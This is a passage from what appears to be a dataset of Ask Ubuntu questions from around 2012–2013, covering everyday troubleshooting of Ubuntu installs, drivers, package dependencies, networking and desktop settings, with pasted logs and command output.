partittions , did a format of the disk , created a new partition . et voila , windows installation started . finally ! wondrous after the installation , windows still had background images located in c : /users/ me /appdata/local/microsoft/themes/roamedthemefiles/desktopbackground/ that i had in the previous installation . before doing : format , delete partition , cascade partitions , create new partition of different size , format partition , install windows . it managed to keep the images through all that . anyone got an idea on that one ? it also remembered the settings for the windows aero theme ... updated question : after all this you 'd think i 'd have the rest figured out . wrong . ubuntu 12.10 , 64 bit installation ca n't read the partitioning of the hdd during the installation . any ideas on how to fix this so the install for a dual-boot system can proceed ? ( preferably without starting anew with windows as well ; ) )
252749	wireless with visible ssid not visible in network menu . unable to connect by manualy enter ssid	i was able to connect to the wireless 'airportfaustin ' and others using network icon dropdown menu . i decided to switch from proprietary to open drivers for my wireless card drivers . once i done it offline . since then 'airportfaustin ' wireless network is missing in the network icon dropdown menu . others are here and work . i tried menu item connect to hidden network : i 'm still unable to connect . ubuntu ask again the key . now ( i do n't know before ) this network is listed in the network manager . this network is allowed for all users . on my computer and others on osx , i can see and connect without issue to that network . i would like to be able again to connect to this and others ( all ) network and that from the network icon dropdown menu . my issue is different from my wireless network not visible in wireless network list with a broadcom card because i was able to connect to that network before and i change my network configuration ( switch open/proprietary ) . i 'm using a macbook air 4,2 with ubuntu 12.04.1 lts and try to connect to a wireless network on a apple airport express ( that has been reset to factory config ) . i 've applied the post-install script on the macbookair4-2 page . i checked /etc/modprobe.d and found two files ( the second is directly made by the script . i remember having seen dkms while running the screen too in the terminal ) that blacklist wireless modules : broadcom-sta-dkms.conf # wl module from broadcom conflicts with the following modules : blacklist b44 blacklist b43legacy blacklist b43 blacklist brcm80211 blacklist brcmsmac blacklist brcmfmac blacklist ssb blacklist bcma blacklist bcm43xx blacklist bcma.conf blacklist bcma following the howto post a wireless issue , my config is : lspci -nn | grep broadcom 02:00.0 network controller [ 0280 ] : broadcom corporation bcm43224 802.11a/b/g/n [ 14e4:4353 ] ( rev 01 ) iwconfig wlan0 wlan0 ieee 802.11 access point : not-associated link quality:5 signal level:201 noise level:166 rx invalid nwid:0 invalid crypt:0 invalid misc:0 lsmod module size used by michael_mic 12612 4 arc4 12529 2 usbhid 47238 0 snd_hda_codec_hdmi 32474 1 snd_hda_codec_cirrus 28098 1 snd_hda_intel 33773 3 snd_hda_codec 127706 3 snd_hda_codec_hdmi , snd_hda_codec_cirrus , snd_hda_intel snd_hwdep 17764 1 snd_hda_codec snd_pcm 97275 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13324 0 snd_rawmidi 30748 1 snd_seq_midi joydev 17693 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61929 2 snd_seq_midi , snd_seq_midi_event snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq applesmc 19554 0 input_polldev 13896 1 applesmc lib80211_crypt_tkip 17390 0 wl 2623795 0 bcm5974 17399 0 snd 79041 16 snd_hda_codec_hdmi , snd_hda_codec_cirrus , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device cfg80211 205774 1 wl lib80211 14381 2 lib80211_crypt_tkip , wl btusb 18332 1 uvcvideo 72627 0 videodev 98259 1 uvcvideo i915 477602 3 v4l2_compat_ioctl32 17128 1 videodev drm_kms_helper 46978 1 i915 drm 241971 4 i915 , drm_kms_helper soundcore 15091 1 snd snd_page_alloc 18529 2 snd_hda_intel , snd_pcm mei 41616 0 i2c_algo_bit 13423 1 i915 mac_hid 13253 0 video 19596 1 i915 apple_bl 13673 0 coretemp 13525 0 bnep 18281 2 parport_pc 32866 0 ppdev 17113 0 rfcomm 47604 12 bluetooth 180153 23 btusb , bnep , rfcomm binfmt_misc 17540 1 lp 17799 0 parport 46562 3 parport_pc , ppdev , lp hid_apple 13375 0 hid 99636 2 usbhid , hid_apple sudo lshw -c network *-network description : interface réseau sans fil produit : bcm43224 802.11a/b/g/n fabriquant : broadcom corporation identifiant matériel : 0 information bus : pci @ 0000:02:00.0 nom logique : wlan0 version : 01 numéro de série : b8:8d:12:08:12:4c bits : 64 bits horloge : 33mhz fonctionnalités : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=5.100.82.112 ip=192.168.0.53 latency=0 multicast=yes wireless=ieee 802.11abgn ressources : irq:17 mémoire : a0400000-a0403fff iwlist scan lo interface does n't support scanning . wlan0 interface does n't support scanning . lsb_release -d description : ubuntu 12.04.1 lts uname -mr 3.2.0-36-generic x86_64
252750	left-click on launcher icon does not start the application	after upgrading from ubuntu 10.04 ( lucid lynx ) to ubuntu 12.04 ( precise pangolin ) almost everything works fine , except launcher . for most icons , left-click on the icon in the launcher does not trigger start of the application in question . only starting the dash and opening the trash works . no other application can be started by left-click on its icon in the launcher . my hardware : toshiba satego x200 laptop with nvidia geforce 8700m gt . prior to upgrading i tested ubuntu 12.04 from a bootable dvd . prior to upgrading i de-installed almost all non-canonical-supported packages , and afterwards re-installed via ubuntu software center and synaptic whatever i need . as an attempt to solve the problem i tried the terminal command unity -- reset-icons , however , this did not help . during execution of unity -- reset-icons a lot of messages were displayed in the terminal , which i quote below in part ( omissions marked by [ ... ] ) . i hope this gives a clue as to what is wrong . $ unity -- reset-icons checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins initializing core options ... done [ ... ] initializing scale options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing ezoom options ... done ( compiz:2599 ) : gconf-critical ** : gconf_client_add_dir : assertion `gconf_valid_key ( dirname , null ) ' failed warn 2013-02-03 16:05:13 unity.favorites favoritestoregsettings.cpp:139 unable to load gdesktopappinfo for 'ubiquity-gtkui.desktop' initializing unityshell options ... done warn 2013-02-03 16:05:14 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/libreoffice-writer.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2013-02-03 16:05:14 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/libreoffice-calc.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2013-02-03 16:05:14 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/libreoffice-impress.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2013-02-03 16:05:14 unity.launcher launcher.cpp:3088 object registration failed . wo n't get dynamic launcher addition . error 2013-02-03 16:05:14 unity.glib-gobject < unknown > :0 g_object_unref : assertion `g_is_object ( object ) ' failed setting update `` main_menu_key '' setting update `` run_key ''
252753	show personalized banner exhibits on ubuntu software center	how can i show my own personalized banner exhibits on ubuntu software center ? i 've seen some url definitions on /usr/share/software-center/softwarecenter/enums.py and /usr/share/software-center/softwarecenter/distro/ubuntu.py so far . i also tried to track the code from the views to the core . but i got lost . _append_banner_adds calls softwarecenteragent . it calls spawnhelper . then i get lost . there are also some calls at simplefiledownloader but i 'm not able to track them . also , i 've noticed this entry on the debug log . 2013-02-08 15:07:43,731 - softwarecenter.simplefiledownloader - debug - download_file : http : //software-center.ubuntu.com/site_media/exhibits/2012/12/sc_banner_mixxx_2.png none true is there documentation on how this is implemented ? some simple recipe to change the default banners and put my own banners on a clean way would be very helpful . i suppose i can simply rewrite the _append_banner_adds function , but i 'm not very prolific on python and i 'd like to understand and use the same methods ubuntu is using , if possible .
252754	live usb not booting after installing windows 8	i have got a problem while booting ubuntu from live usb . live usb was working fine before installing windows 8. but after installing windows 8 , it does n't boot with live usb . what should i do to work live usb again ?
252756	ubuntu app store : waiting 4+ months now for approval/review ?	i submitted my application to ubuntu app store ( http : //developer.ubuntu.com/ ) almost 5 months ago . it is still waiting for approval or review . so far no comments , or any evidence that anything at all is happening on the app store . my application is `` triplea '' , which has been around for 10+ years on linux . we are open source and free ( http : //triplea.sourceforge.net/ ) . i normally make a new stable release twice per year , and we are still a fairly popular application ( around 10,000 downloads per month from our website ) . i believe is an old version of triplea is already on the ubuntu app store , someone told me it was version 1.3.2.2 or something , which is about 2 years old . our latest version was released a month ago and is version 1.6.1.4 . so what is the hold up on the review/approval for our app ? i did n't see any contact-us page , or complaint page , or any way for me to get any attention and alert the people who run the app store that i am still waiting . if this is not the correct place to request a review , then please tell me where or how to get this done . thanks , veqryn
252760	how do i save files edited with vim ?	i ca n't save changes after editing sudo vi /etc/network/interfaces text before editing : auto lo iface lo inet ... edited to : auto eth0 iface eth0 inet dhcp what key combination or sequence must i press to save this ?
252762	where does netbeans remember opened files ?	i tried to open a huge sql file in netbeans and it hangs now . restarting does not help because on restart it again tries to open that file . reinstalling netbeans does not help . where does it remember opened files so i could manually delete the appropriate entry for that huge sql file ? thanks .
252763	assign more tmp space for libre office	i encountered the error resource exhausted . no more space on device . while saving a huge spreadsheet ( libre office calc 3.5 ) . is there a relation to the tmp space assigned for operations in libre office and if yes , how do i assign more space so that the saving can be realised ? more information : this error was encountered while trying to save in .csv and .ods as well . trying to save in .xlsx leads to write error . the file could not be written .
252765	how can i map my bamboo tablet to the entire screen after increasing screen resolution ?	the physical drawing area on my wacom bamboo mte-450 pen tablet corresponds perfectly with the edges of the screen when the resolution is 1024x768 . however , when i increase it to 1152x864 , the tablet is still only mapped to the 1024x768 pixels in the upper left portion of the screen , so the pen reaches the edge of the tablet before the cursor actually reaches the edge of the screen . how can i utilize the full screen without going back to 1024x768 ? i 'm running 12.04 , 64-bit .
252769	ubuntu 12.04 - thunderbird 17.0.2 - set mime enconding quoted printable	ubuntu 12.04 - thunderbird 17.0.2 how can i set the mime enconding = `` quoted printable '' for messages containing 8-bit characters ?
252771	how to change default `` sort by '' to `` type '' in nautilus	how to change the sort by for folders to type , because i want folders to be shown first and then files by name . when i sort by type , i get the result i want , but i need to change this for all my folders . how can i change the default preference to sort by : type , so every folder will by default be sorted by type ? i tried with dconf-editor , then org > gnome > nautilus > preferences and tried to choose type in default-sort-order , but i can only select modification_date , not by type .
252774	ca n't connect to wired internet	okay , so i recently installed ubuntu on an old laptop and now it wo n't connect to the internet . when i plug in the ethernet cord is says connecting and the little icon things moves but after a minute or so it says disconnected and repeats . before i installed ubuntu it worked fine using win xp so it 's not the port or anything and besides , it recognizes the cord is there , it just wo n't fully connect . i do n't have wireless so i ; m not sure if that works or not but i can view the networks around my place . any ideas ? i really need to get this working . thanks . tl ; dr lan says connecting and then says disconnected .
252777	how can i resolve dpkg dependency ?	administrator @ zlounes : ~ $ sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : linux-server : depends : linux-headers-server ( = 3.2.0.37.44 ) but 3.2.0.37.45 is installed e : unmet dependencies . try using -f. administrator @ zlounes : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : linux-image-server linux-server the following packages will be upgraded : linux-image-server linux-server 2 upgraded , 0 newly installed , 0 to remove and 9 not upgraded . 4 not fully installed or removed . need to get 0 b/4,458 b of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y traceback ( most recent call last ) : file `` /usr/bin/apt-listchanges '' , line 237 , in < module > main ( ) file `` /usr/bin/apt-listchanges '' , line 48 , in main debs = apt_listchanges.read_apt_pipeline ( config ) file `` /usr/share/apt-listchanges/apt_listchanges.py '' , line 83 , in read_apt_pipeline return map ( lambda pkg : filenames [ pkg ] , order ) file `` /usr/share/apt-listchanges/apt_listchanges.py '' , line 83 , in < lambda > return map ( lambda pkg : filenames [ pkg ] , order ) keyerror : 'linux-image-server' setting up initramfs-tools ( 0.99ubuntu13.1 ) ... update-initramfs : deferring update ( trigger activated ) setting up linux-image-3.2.0-37-generic ( 3.2.0-37.58 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) the link /initrd.img is a dangling linkto /boot/initrd.img-3.2.0-37-generic examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-37-generic /boot/vmlinuz-3.2.0-37-generic update-initramfs : generating /boot/initrd.img-3.2.0-37-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.2.0-37-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.2.0-37-generic.postinst line 1010. dpkg : error processing linux-image-3.2.0-37-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-server : linux-image-server depends on linux-image-3.2.0-37-generic ; however : package linux-image-3.2.0-37-generic is not configured yet . dpkg : error processing linux-image-server ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-server : linux-server depends on linux-image-server ( = 3.2.0.37.44 ) ; however : package linux-image-server is not configured yet . linux-server depends on linux-headers-server ( = 3.2.0.37.44 ) ; however : version of linux-headers-server on system is 3.2.0.37.45. dpkg : error processing linux-server ( -- configure ) : dependency problems - leaving unconfigured processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.2.0-36-generic no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.2.0-36-generic with 1. dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : linux-image-3.2.0-37-generic linux-image-server linux-server initramfs-tools e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 've tried a lot and ca n't get this working . i think i interrupted an install and it just screwed it all up . i 've googled and tried various fixes . edit ( after cleaning my /boot folder ) : administrator @ zlounes : /boot $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : linux-server the following packages will be upgraded : linux-server 1 upgraded , 0 newly installed , 0 to remove and 9 not upgraded . 1 not fully installed or removed . need to get 0 b/1,734 b of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y traceback ( most recent call last ) : file `` /usr/bin/apt-listchanges '' , line 237 , in < module > main ( ) file `` /usr/bin/apt-listchanges '' , line 48 , in main debs = apt_listchanges.read_apt_pipeline ( config ) file `` /usr/share/apt-listchanges/apt_listchanges.py '' , line 83 , in read_apt_pipeline return map ( lambda pkg : filenames [ pkg ] , order ) file `` /usr/share/apt-listchanges/apt_listchanges.py '' , line 83 , in < lambda > return map ( lambda pkg : filenames [ pkg ] , order ) keyerror : 'linux-server' dpkg : dependency problems prevent configuration of linux-server : linux-server depends on linux-image-server ( = 3.2.0.37.44 ) ; however : version of linux-image-server on system is 3.2.0.37.45. linux-server depends on linux-headers-server ( = 3.2.0.37.44 ) ; however : version of linux-headers-server on system is 3.2.0.37.45. dpkg : error processing linux-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . e : sub-process /usr/bin/dpkg returned an error code ( 1 ) administrator @ zlounes : /boot $
252784	how can i make a html5 app for ubuntu mobile ?	is there any tutorial ? i made some apps in html5 but i do n't know how to `` compile '' or transform this code to obtain an ubuntu mobile app . thanks for your help .
252785	how to extract ui images like icons , windows , buttons from ubuntu 12 ?	i have downloaded the ubuntu os for my computer . i needed few system ui images . but unable to find , i need them for my icons and windows . thank you
252786	ca n't shutdown/restart linux	this started yesterday , i 'm dual booting win7 and ubuntu but when i 'm shutting down/restarting ubuntu to switch os i only get to the log-out screen . i can turn the computer off with the power button but i would like to be able to do it the normal way . thanks in advance //oskar
252794	can not connect to bluetooth speaker logitech boombox	i looked and could n't find an answer to my problem . i am trying to connect to my logitech boombox via bluetooth . it recognizes the device , but once it pairs it claims `` failed authentication '' . thx , sebas
252795	convert running system to raid 5	i have a machine with 3 identical disks . i performed a clean installation of ubuntu 12.10 on one disk . how can i convert the running system to boot off a ( software ) raid5 comprised of all three disks ( one of these is in use running the system ) ? is it possible to start a raid 5 md device in degraded mode using 2 disks ( disks 2 & 3 ) , copy the data over from disk1 , boot of of 2 & 3 ( raided 5 ) and then add disk1 into the md device and let them resync ? if possible , how would i got about doing this ? what are the steps i need to perform ? and if possible , do you know of a tutorial i can follow ? [ i know something similar is possible if you want to boot off of a raid 1 , you started a degraded device and add the first disk later ] thanks .
252804	netbook slow on ubuntu ( and win 7 ) . tips and tricks for speeding up	my computer just broke down so i got a new one on second hand because i need one in the mean time while it 's on repair . i got a 10 '' dell inspiron mini 1012 . however , it 's slow . really slow . usually when i open like 10 tabs with just text in chrome it freezes and becomes unresponsive . the computer was completely wiped and came with a brand new windows 7 starter edition freshly installed . i tried installing ubuntu 12.10 on it and it was a little bit faster but it 's still slow and becomes unresponsive a lot of times . i 'm thinking of buying some extra ram for it ( updating from 1 g to 2 g ) . however i 'm wondering if this would help . is it probable that it is the low ram that makes it slow or could it be that it is something else , like the hard drive being worn out because it is second hand ? are there any ubuntu tweaks i can do that can make the installation lighter ? or if not , any other linux distro that might be good for my particular computer . i know that ubuntu had a netbook edition before but from what i understand the two merged . i sort of ca n't get my head around why it 's so slow because my other laptop had like 2 g of ram and a similar speed on the processor and i have no problem running seven youtube videos simultaneously while doing other stuff . with this , however , running only 1 youtube video often lags . what do you think ? is the extra gig of ram worth it or will it still be slow on account of it being a netbook and being cheap ? specs : chipset : intelâž atom nm10 express cpu speed : 1.66 ghz ram memory : 1 gb wireless : dellâ˘ wireless 1397 802.11g half mini-card bluetooth : dell wireless 365 bluetooth internal ( 2.1 ) mini-card integrated network connector 10/100 lan ( rj45 )
252805	permission denied for using some files or copying files to desktop	sometimes ago i experienced couple of errors in my ubuntu 12.10 and i was getting the permission denied error in a lot of softwares . finally i found the solution . i found out that a lot of the files in my system including the files and folders in the `` home '' directory like `` pictures '' `` desktop '' `` music '' and other folders are set to `` www-data '' in the permission tab when i click on every and each one of those folders and files i right clicked on and then clicked on properties . so one solution is to become root in nautilus and then change that `` www-data '' to `` user-name '' in every file or folder , but it will take a long time for me to do that . so my question is , is there any easier way to make `` user-name '' default again ? after i ran this command : find /home/ { username } -user www-data | xargs sudo chown { username } i got these errors : amirrazor @ ubuntu : ~ $ find /home/amirrazor -user www-data | xargs sudo chown amirrazor xargs : unmatched single quote ; by default quotes are special to xargs unless you use the -0 option [ sudo ] password for amirrazor : chown : can not access `/home/amirrazor/test ' : no such file or directory chown : can not access `piano.wma ' : no such file or directory chown : can not access `/home/amirrazor/ubuntu ' : no such file or directory chown : can not access `one/shared ' : no such file or directory chown : can not access `with ' : no such file or directory chown : can not access `me ' : no such file or directory chown : can not access `/home/amirrazor/old_media ' : no such file or directory chown : can not access `cache_000/f_000003 ' : no such file or directory chown : can not access `/home/amirrazor/old_media ' : no such file or directory chown : can not access `cache_000/f_000007 ' : no such file or directory chown : can not access `/home/amirrazor/old_media ' : no such file or directory chown : can not access `cache_000/f_000002 ' : no such file or directory chown : can not access `/home/amirrazor/old_media ' : no such file or directory chown : can not access `cache_000/data_1 ' : no such file or directory chown : can not access `/home/amirrazor/old_media ' : no such file or directory chown : can not access `cache_000/f_000004 ' : no such file or directory chown : can not access `/home/amirrazor/old_media ' : no such file or directory chown : can not access `cache_000/index ' : no such file or directory chown : can not access `/home/amirrazor/old_media ' : no such file or directory chown : can not access `cache_000/data_2 ' : no such file or directory chown : can not access `/home/amirrazor/old_media ' : no such file or directory chown : can not access `cache_000/f_000006 ' : no such file or directory chown : can not access `/home/amirrazor/old_media ' : no such file or directory chown : can not access `cache_000/f_000001 ' : no such file or directory chown : can not access `/home/amirrazor/old_media ' : no such file or directory chown : can not access `cache_000/data_3 ' : no such file or directory chown : can not access `/home/amirrazor/old_media ' : no such file or directory chown : can not access `cache_000/f_000005 ' : no such file or directory chown : can not access `/home/amirrazor/old_media ' : no such file or directory chown : can not access `cache_000/data_0 ' : no such file or directory
252809	do n't know ubuntu username and password	i installed my ubuntu today and i logged out but now it asks for username and password which i never set up . please help !
252816	ubuntu 12.10 with nvidia v11 ( gefore2 mx/mx 400 ) graphic card	just upgraded ubuntu from 10.10 to 12.10 . after the machine rebooted , there is a graphic window lists all users . but when select a user and login , the desktop does not show up . i have to use ctrl-alt-f1 to get a terminal to manipulate the machine . i looked the questions and answers on web . i tried the following according to the answers . ubuntu only has xserver-xorg-swat-nouveau installed . tried sudo apt-get install linux-source sudo apt-get install linux-headers-generic sudo apt-get install nvidia-current-updates tried sudo apt-get install linux-source sudo apt-get install linux-headers-generic sudo apt-get install nvidia-current-updates tried sudo apt-get install -- reinstall unity sudo apt-get install -- reinstall ubuntu-desktop none of these works . please help and thinks in advance ! john
252817	why did my analog tv tuner stop working in 12.10 ?	i have two analog tv tuners . both use the chip saa7130 : `` kworld pci plus tv '' and `` encore fmltv-fm '' they worked ok in 10.04 `` out of the box '' and now i want to update to a new ubuntu and i ca n't get them to work in 12.10. they are correctly reconized in `` dmesg '' with their name and model , and registered as video0 and video1 tvtime : i can find just 2/3 channels , but with poor quality . i think the card is recognized but the tuner=xx is not correct ... i think this is due to ubuntu changed v4l1 to v4l2 . can i come back to v4l1 ? perhaps i can manually change the `` tuner=xx '' to a correct one ? then there is another problem : when i try to use tvtime with a specific card tvtime -- device /dev/video0 ( or video1 ) i get can not open capture device /dev/video0 . then i tried mythtv and when i want to put a card it just said failed to open . so i don t know what to think , it seems that there is a privilege problem ? ( i tried running as root , adding my user to group video , etc ... no luck )
252821	can i use the openvpn access server web gui on ubuntu 12.04 ?	is the openvpn web-gui working on ubuntu 12.04 ? see access-server : download openvpn for ubuntu on openvpn.net . on the link above i only see support for ubuntu 10 and below .
252825	can a script starting with a bad shebang line work ?	creating certain scripts to use in lubuntu/lxde as described here that should look like this and were made to be run by shortcut as described in the last part of that answer , in order to search on the internet a selected text , i have made a mistake : i have started certain scripts with the line # ! bin/bash instead of # ! /bin/bash but only discovered the error after trying to use the same scripts in a different system ( xfce in mint ) , which made me search and find the answer here , which suggested the correction : and now the corrected scripts work as intended in mint/xfce . but the scripts with the bad line are still working in lubuntu as if the bad line was not that bad ! ( the lxde shortcut settings are in ~/.config/openbox/lubuntu-rc.xml and they clearly indicate scripts that contain the bad line . ) how is this possible ?
252827	how can i continue having two fingers on the trackpad ?	i 'm quite new to ubuntu ( with gui ) - just got over from os x. i have installed ubuntu 12.10 on my macbook pro 9.2 , and i have the habit of leaving one finger at the bottom of the trackpad ready to click while i am using another finger to move the cursor around . this is not possible with my current settings . the moment i have two fingers on the trackpad , either the mouse pointer stops moving or the window starts scrolling . is there anyone who know how i can get it to accept my habit , or am i just going to live with it ?
252829	ca n't upgrade to libreoffice 4	i tried to upgrade my libreoffice to 4.0 on my ubuntu 12.04 , but now it does n't work anymore . if i try to install libreoffice again , i get the following output : the following packages have unmet dependencies : libreoffice : depends : libreoffice-core ( = 1:3.6.0~rc4-0ubuntu3~ppa1~precise1 ) but it is not going to be installed depends : libreoffice-writer but it is not going to be installed depends : libreoffice-calc but it is not going to be installed depends : libreoffice-impress but it is not going to be installed depends : libreoffice-draw but it is not going to be installed depends : libreoffice-math but it is not going to be installed depends : libreoffice-base but it is not going to be installed libreoffice-gnome : depends : libreoffice-core ( = 1:3.6.0~rc4-0ubuntu3~ppa1~precise1 ) but it is not going to be installed depends : libreoffice-gtk but it is not going to be installed e : unable to correct problems , you have held broken packages . would be so great , if anybody could help me ! thanks !
252835	gnome 2 apps do not use system theme ( ubuntu mini iso + ubuntu gnome )	i used ubuntu mini iso and installed ubuntu gnome desktop . gnome 2 applications like firefox ( and also qt apps ) do not use the system theme ( adwaita ) and looks ugly . 1 ) installed murrine gnome 2 theme engine 2 ) installed libgnome2-common 3 ) change setting in qt4-qtconfig ( the gtk+ theme in qtconfig preview looks ugly as well ) .
252837	window drag lock in ubuntu 11.10 x64	i have installed 64 bit ubuntu 11.10 on my asus g53jw notebook using wubi . it has an nvidia gtx460m graphics card . i have installed nvidia driver version 304.54 the problem is that sometimes the whole desktop freezes and some random window gets locked in its position . the locked window has orange circular icons on its borders and a big circle at the center , with arrows inside them . i am unable to drag , click or close the window . most of the time it happens when i 'm typing something really fast in the terminal or browser . how can i solve this problem ?
252846	installation issue with safari	i was trying to download and install safari on my desktop ( ubuntu 12.04 ) . for that i used the below : how to install safari on ubuntu . now after running the command as per above link : sudo apt-get install wine - i got the below : pp @ ubuntu : ~ $ sudo apt-get install wine reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine : depends : wine1.4 but it is not going to be installed e : unable to correct problems , you have held broken packages . pp @ ubuntu : ~ $ could you tell me what do next ? as i am very new user on ubuntu , so confused .
252848	ca n't install ubuntu dual boot with windows 7	two months ago i tried to install ubuntu 12.10 on my new fujitsu laptop . i downloaded wubi and installed ubuntu with it . when i restarted the computer after the installation , i got a error while trying to enter to ubuntu : /ubuntu/winboot/wubildr.mbr file missing or corrupt i asked here what to do , and i was told to install ubuntu from live-cd . after i installed ubuntu from the cd , i could n't enter to windows 7 or the bios , so i could n't reinstall windows and had to send the laptop to fujitsu repair service . few mins ago i tried again to install ubuntu with wubi and i got the same error . i very want to install ubuntu , but i will not install ubuntu again from the cd , so please , if you can help me install ubuntu witu wubi . thanks !
252850	where does deluge store active torrent files ?	i had some torrent files downloading when i made fresh install after i backed up everything . so now files are incomplete and i want to find the former torrent files ( .torrent ) in my backup in order to add them again .
252853	how to mount a virtualbox shared folder at startup ?	i have ubuntu installed in virtualbox . i want to mount my virtualbox shared folder in ubuntu automatically when i log in ubuntu . i put the following line in my ~./bashrc and ~/.bash_profile : sudo mount -t vboxsf windows_share /media/windows_share where windows_share is the name i created with virtualbox . but everytime i start my ubuntu , it asks me for passwd since it needs sudo . is there anyway to automatically mount windows share without entering password every time i log in ?
252856	is the ubuntu `` restore test '' program legitimate ?	i have an encrypted home directory , and today when i came to my computer , there was a prompt i had never seen before labeled `` restore test '' , which asked me to input my home directory decryption key . well , i put in the decryption key , and pressed ok , and the prompt went away , never reporting success or failure . now i 'm a bit suspicious of the program . so : is this a legitimate part of ubuntu and not some spear phishing attack ? how can i be sure ? if this is just a bad ux , where do i report this as a bug so others do n't have to worry as i currently am ? thanks .
252858	installing drivers using a live disc . is it possible ?	i accidentally removed my video card and forgot to reinstall it . after rebooting and splash screen ubuntu did n't start and o could n't start it manually because it stops before i get to the terminal . my question is ... can i reinstall my video card 's driver using a live disc ? or should i back up my files and reinstall ubuntu ? i pretty much prefer the fist option since i do n't know how to back up my files and preferences . if you have a good answer for my problem i 'd really appreciate it because i wo n't be able to have enough time to fix my computer since i 'll spend my time on road . thanks in advance , have a nice day .
252859	battery life : 90 min on acer ultrabook / 12.10	i usually work on my acer m5-481tg with windows 8 x64 and recently installed ubuntu 12.10 ( x64 ) alongside with it . unfortunately , the battery-life is roughly one and a half hour - which apparently is disasterous , compared to the 5-6 hrs it runs under windows . the whole laptop gets quite hot and the fans keep running like crazy all the time . i though it might be the gt64m graphics card that causes this , but after checking the switcheroo-logs , the integrated solution is active ( as intended ) . root @ nubuntu : ~ # cat /sys/kernel/debug/vgaswitcheroo/switch 0 : igd : + : pwr:0000:00:02.0 1 : dis : : pwr:0000:01:00.0 i 've no clue what might be causing this . besides : neither the touchpad , nor the display-brightness-keys work properly . any suggestions ?
252863	unity broken after regular updates	today i updated ubuntu 12.04 with the update manager as usual . after that i restarted the system as required . when i logged in again the sidebar has only the trash can , the dash button and the switch workspaces button . no other shortcuts appear at all . the top bar is there but has nothing . not even the power symbol . finally on the desktop no icons appear , right clicking does nothing and using ctr+alt+t does n't bring up the console . i restarted the computer several times and it 's always the same . help ? edit : i solved it . i pressed ctrl+alt+f1 to enter the terminal . then i used the last tip in this video and it worked i.e . i typed sudo setsid service lightdm restart
252869	broken install of ubuntu studio 12.04lts	i am a budding linux enthusiast who seems to keep running into problems , but am determined to fix this one . hopefully someone here can help : ) i was having some problems with an install of ubuntu 12.10 so i decided to reinstall ubuntu studio 12.04 over the existing install . i am running a dual boot winxp/ubuntu system and decided it would be safe to reinstall ubuntu from a liveusb of ubuntu studio 12.04 i had on an existing usb stick . all went well , booted from the usb , played around with it for a while then decide to install . chose the option that said 'install over your existing ubuntu 12.10 ' - let this run , finish and then rebooted . i was then faced with the grub rescue prompt and 'no such partition ' . i then rebooted this time with my usb stick in and lo and behold it booted into grub with my usual boot options e.g . ubuntu , memtest , win xp etc.etc . so i figure somehow i 've installed the bootloader to my usb ( /sdb1 ) and my system wo n't boot without it . have installed boot-repair and ran the log : http : //paste.ubuntu.com/1626253/ my old ubuntu 12.10 was installed on a partition called /dev/sda2 which no longer exists , and new install of 12.04 is on /dev/sda6 . should i just run boot-repair and hope for the best ? i have had a similar problem before and boot repair melted my system somehow . fortunately i have got a complete image of my hard drive which i took about 6 months ago , i 'd rather use this as a last resort though if i ca n't recover this . help me please ! ! !
252872	ca n't find ati mobility radeon hd 6370 driver for ubuntu 12.10 64-bit on hp pavilion dv7-4285dx	i 've got an hp pavilion dv7-4285dx that has switchable graphics between some generic intel card and the discrete card , an ati mobility radeon hd 6370 . i 'd like to be able to use that ati card for high performance graphics on my laptop in ubuntu but when i try to use the fglrx drivers , it still says that only the intel card is being used . i installed amd 's ati radeon hd 63xx series drivers but that led to ubuntu booting and going attempting to go into `` low graphics mode '' which ended up just freezing on the `` low graphics mode '' selection screen , so i went into ctrl+alt+f1 console and reinstalled the fglrx driver so i could reboot into linux . i assume it did n't work because my card is the ati mobility radeon hd6370 which is apparently not the same as ati radeon hd 63xx series . now that you know my life story , has anybody been able to get the ati mobility radeon hd 6370 working in ubuntu 12.10 64-bit , or any other version of ubuntu for that matter ? thanks in advance -rob
